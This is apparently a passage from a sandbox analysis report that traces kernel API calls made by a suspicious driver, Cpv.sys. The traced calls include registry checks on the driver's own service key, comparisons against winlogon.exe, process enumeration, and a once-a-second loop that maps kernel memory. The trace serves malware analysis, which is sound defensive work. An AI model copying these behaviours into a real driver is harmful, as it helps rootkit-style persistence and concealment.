| RtlInitUnicodeString | SourceString = \??\C:\Windows\System32, DestinationString_out = \??\C:\Windows\System32 | ||||
| ZwCreateFile | DesiredAccess_unk = 0x80000000, ObjectAttributes_ptr = 0xffffd00033d28cf0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Windows\System32, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x0, ShareAccess = 0x1, CreateDisposition = 0x1, CreateOptions = 0x20, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d28fb0, FileHandle_out = 0xffffffff80000aa0, IoStatusBlock_unk_out = 0xffffd00033d28cd0, ret_val_out = 0x0 | ||||
| ZwQueryInformationFile | FileHandle_unk = 0xffffffff80000aa0, Length = 0x28, FileInformationClass_unk = 0x4, IoStatusBlock_unk_out = 0xffffd00033d28cd0, FileInformation_ptr_out = 0xffffd00033d28c40, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| RtlInitUnicodeString | SourceString = \??\C:\Windows\System32\drivers\Cpv.sys, DestinationString_out = \??\C:\Windows\System32\drivers\Cpv.sys | ||||
| ZwCreateFile | DesiredAccess_unk = 0x80000000, ObjectAttributes_ptr = 0xffffd00033d28cf0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Windows\System32\drivers\Cpv.sys, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x0, ShareAccess = 0x1, CreateDisposition = 0x1, CreateOptions = 0x20, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d28fb0, FileHandle_out = 0xffffffff80000aa0, IoStatusBlock_unk_out = 0xffffd00033d28cd0, ret_val_out = 0x0 | ||||
| ZwQueryInformationFile | FileHandle_unk = 0xffffffff80000aa0, Length = 0x28, FileInformationClass_unk = 0x4, IoStatusBlock_unk_out = 0xffffd00033d28cd0, FileInformation_ptr_out = 0xffffd00033d28d20, ret_val_out = 0x0 | ||||
| ZwSetInformationFile | FileHandle_unk = 0xffffffff80000aa0, IoStatusBlock_unk = 0xffffd00033d28cd0, FileInformation_ptr = 0xffffd00033d28d20, Length = 0x28, FileInformationClass_unk = 0x4, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b9db2560, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x68, ret_val_ptr_out = 0xffffc000b7f0ac50 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000bae00000, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b8567010, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000ba1495b0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b8fbc110, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b83dbbe0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000ba12f220, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b9323ef0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b8e43d00, Tag = 0x0 | ||||
| ZwOpenKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28d20, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb0, KeyHandle_out = 0xffffffff80000fdc, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = ImagePath, DestinationString_out = ImagePath | ||||
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80000fdc, ValueName = ImagePath, KeyValueInformationClass_unk = 0x2, Length = 0x0, KeyValueInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d28fa0, ret_val_out = 0xc0000023 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba534be0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba534be0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d286d8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba534be0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba534be0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d283b8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba534be0, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd00033d283b8, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x56, ret_val_ptr_out = 0xffffc000ba0acf50 | ||||
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80000fdc, ValueName = ImagePath, KeyValueInformationClass_unk = 0x2, Length = 0x56, KeyValueInformation_ptr_out = 0xffffc000ba0acf50, KeyValueInformation_deref_TitleIndex_out = 0x0, KeyValueInformation_deref_Type_out = 0x2, KeyValueInformation_deref_DataLength_out = 0x4a, KeyValueInformation_deref_Data_out = \SystemRoot\System32\drivers\Cpv.sys, ResultLength_ptr_out = 0xffffd00033d28fa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba534be0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba534be0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d286d8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba534be0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba534be0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d283b8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba534be0, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd00033d283b8, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| wcsstr | _Str = \SystemRoot\System32\drivers\Cpv.sys, _SubStr = \??\ | ||||
| RtlInitUnicodeString | SourceString = \SystemRoot, DestinationString_out = \SystemRoot | ||||
| ZwOpenFile | DesiredAccess_unk = 0x100000, ObjectAttributes_ptr = 0xffffd00033d28c30, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \SystemRoot, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ShareAccess = 0x1, OpenOptions = 0x21, FileHandle_ptr_out = 0xffffd00033d28c88, FileHandle_out = 0xffffffff80000bb8, IoStatusBlock_unk_out = 0xffffd00033d28c20, ret_val_out = 0x0 | ||||
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000bb8, DesiredAccess_unk = 0x1f01ff, ObjectType_unk = 0xffffe0003a468dc0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00033d28c90, Object_out = 0xffffe0003b6bf3a0, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 | ||||
| IoQueryFileDosDeviceName | FileObject_unk = 0xffffe0003b6bf3a0, ObjectNameInformation_unk_out = 0xffffd00033d28c80, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000bb8, ret_val_out = 0x0 | ||||
| ObfDereferenceObject | Object_ptr = 0xffffe0003b6bf3a0, ret_val_ptr_out = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000ba13fd00, Tag = 0x0 | ||||
| RtlAppendUnicodeToString | Source = \??\, Destination_out = \??\, ret_val_out = 0x0 | ||||
| RtlAppendUnicodeToString | Destination = \??\, Source = C:\Windows, Destination_out = \??\C:\Windows, ret_val_out = 0x0 | ||||
| RtlAppendUnicodeToString | Destination = \??\C:\Windows, Source = \System32\drivers, Destination_out = \??\C:\Windows\System32\drivers, ret_val_out = 0x0 | ||||
| RtlAppendUnicodeToString | Destination = \??\C:\Windows\System32\drivers, Source = \Cpv.sys, Destination_out = \??\C:\Windows\System32\drivers\Cpv.sys, ret_val_out = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000ba0acf50, Tag = 0x0 | ||||
| ZwCreateFile | DesiredAccess_unk = 0x10000000, ObjectAttributes_ptr = 0xffffd00033d28cf0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Windows\System32\drivers\Cpv.sys, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x0, CreateDisposition = 0x1, CreateOptions = 0x10, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d28fb8, FileHandle_out = 0xffffffff80000bb8, IoStatusBlock_unk_out = 0xffffd00033d28d50, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000bb8, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffd00033d28fb0, ret_val_out = 0xc0000008 | ||||
| ZwCreateFile | DesiredAccess_unk = 0x80000000, ObjectAttributes_ptr = 0xffffd00033d29020, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Windows\System32\drivers\Cpv.sys, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x0, ShareAccess = 0x0, CreateDisposition = 0x1, CreateOptions = 0x20, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xfffff800fc55af60, FileHandle_out = 0xffffffff80000bb8, IoStatusBlock_unk_out = 0xffffd00033d29010, ret_val_out = 0x0 | ||||
| ZwQuerySystemInformation | SystemInformationClass_unk = 0x5, Length_ptr = 0x0, SystemInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d29480, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1ef78, ret_val_ptr_out = 0xffffe0003af96000 | ||||
| ZwQuerySystemInformation | SystemInformationClass_unk = 0x5, Length_ptr = 0x1ef78, SystemInformation_ptr_out = 0xffffe0003af96000, ResultLength_ptr_out = 0xffffd00033d29480, ret_val_out = 0xc0000004 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af96000, Tag = 0x0 | ||||
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00033d29480, Interval = -10000000, ret_val_out = 0x0 | ||||
| ZwQuerySystemInformation | SystemInformationClass_unk = 0x5, Length_ptr = 0x0, SystemInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d29480, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1ed98, ret_val_ptr_out = 0xffffe0003c8ca000 | ||||
| ZwQuerySystemInformation | SystemInformationClass_unk = 0x5, Length_ptr = 0x1ed98, SystemInformation_ptr_out = 0xffffe0003c8ca000, ResultLength_ptr_out = 0xffffd00033d29480, ret_val_out = 0x0 | ||||
| PsLookupProcessByProcessId | ProcessId_unk = 0x0, Process_unk_out = 0xffffd00033d29488, ret_val_out = 0xc000000b | ||||
| PsLookupProcessByProcessId | ProcessId_unk = 0x4, Process_unk_out = 0xffffd00033d29488, ret_val_out = 0x0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
|
For performance reasons, the remaining entries are omitted.
Click to download all entries as text file. |
|||||
Code Block #7 (EP #177)
»
| Information | Value |
|---|---|
| Trigger | KiInterruptDispatchNoLockNoEtw+0x1dc |
| Start Address | 0xfffff800fc2cb1c0 |
Execution Path #177 (length: 899, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 899 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c21f350 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c21f350, MemoryDescriptorList_unk_out = 0xffffe0003c21f350 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c21f350, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00037d3ea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00037d3ea40, MemoryDescriptorList_unk = 0xffffe0003c21f350 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c21f350 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0004aff7370 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0004aff7370, MemoryDescriptorList_unk_out = 0xffffe0004aff7370 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0004aff7370, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00045bbaa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00045bbaa40, MemoryDescriptorList_unk = 0xffffe0004aff7370 |
| IoFreeMdl | Mdl_unk = 0xffffe0004aff7370 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c21f350 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c21f350, MemoryDescriptorList_unk_out = 0xffffe0003c21f350 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c21f350, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00049b7ea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00049b7ea40, MemoryDescriptorList_unk = 0xffffe0003c21f350 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c21f350 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c067610 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c067610, MemoryDescriptorList_unk_out = 0xffffe0003c067610 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c067610, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd000292dea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd000292dea40, MemoryDescriptorList_unk = 0xffffe0003c067610 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c067610 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b096970 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b096970, MemoryDescriptorList_unk_out = 0xffffe0003b096970 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b096970, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b55ea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b55ea40, MemoryDescriptorList_unk = 0xffffe0003b096970 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b096970 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9bd520 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9bd520, MemoryDescriptorList_unk_out = 0xffffe0003b9bd520 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9bd520, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002bb3ea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bb3ea40, MemoryDescriptorList_unk = 0xffffe0003b9bd520 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9bd520 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8750 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8750, MemoryDescriptorList_unk_out = 0xffffe0003c1f8750 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8750, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002be1aa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002be1aa40, MemoryDescriptorList_unk = 0xffffe0003c1f8750 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8750 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b096970 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b096970, MemoryDescriptorList_unk_out = 0xffffe0003b096970 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b096970, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002bf30a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bf30a40, MemoryDescriptorList_unk = 0xffffe0003b096970 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b096970 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c6a9a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c6a9a40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c067610 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c067610, MemoryDescriptorList_unk_out = 0xffffe0003c067610 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c067610, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002d0aba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d0aba40, MemoryDescriptorList_unk = 0xffffe0003c067610 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c067610 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c067610 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c067610, MemoryDescriptorList_unk_out = 0xffffe0003c067610 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c067610, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002e443a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e443a40, MemoryDescriptorList_unk = 0xffffe0003c067610 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c067610 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c067610 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c067610, MemoryDescriptorList_unk_out = 0xffffe0003c067610 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c067610, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002e906a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e906a40, MemoryDescriptorList_unk = 0xffffe0003c067610 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c067610 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000463fe010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000463fe010, MemoryDescriptorList_unk_out = 0xffffe000463fe010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000463fe010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002f8dea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f8dea40, MemoryDescriptorList_unk = 0xffffe000463fe010 |
| IoFreeMdl | Mdl_unk = 0xffffe000463fe010 |
